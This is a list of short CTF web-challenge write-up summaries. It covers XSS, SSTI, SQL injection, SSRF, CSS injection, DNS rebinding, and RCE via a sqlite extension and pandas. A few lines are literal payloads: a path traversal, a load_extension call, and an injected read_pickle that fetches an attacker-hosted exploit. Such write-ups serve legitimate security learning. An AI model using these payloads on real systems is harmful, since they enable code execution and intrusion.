tl;dr

• Leak csrf token bypassing document.domain
• visiting /profile/ will not change the nonce
• Leak nonce using dangling markup in firefox
• Add XSS payload using the csrf to get the flag

tl;dr

• SSTI in the valentine card
• bypass filter by setting ejs delimiter option
• RCE :yay:

tl;dr

• Create a sqlite3 extension with rce payload.
• Abuse werkzeug tempfile to upload the extension to server.
• load that extension using load_extension(‘/proc/self/fd/fd_no’);

tl;dr

• read output using ValueError
• sys.modules to print all the app modules
• go through the module classes and find the test case functions and re-write them to always return true

tl;dr

• craft a payload with a random nonce
• use hash-collider to collide the nonce we gave earlier

tl;dr

• SSRF using file_get_contents() and CRLF in ini_set()
• basic Header quirks to bypass waf
• sqli using column trick in SQLite to get the flag

tl;dr
- CSS injection using url forging
- leaking password using :empty selectors

tl;dr
-Get the docker-entrypoint.sh using /static../docker-entrypoint.sh
-Get the challenge files using /static../panda/cgi-bin/search_currency.py
-Host your exploit and use x’|@pd.read_pickle(‘http://0.0.0.0:6334/output.exploit')|' to execute the exploit

tl;dr

• Create a note with meta redirect tag to get callback.
• Leak the flag using search functionality.

tl;dr

• Use DNS Rebinding attack to read flag from /flag endpoint.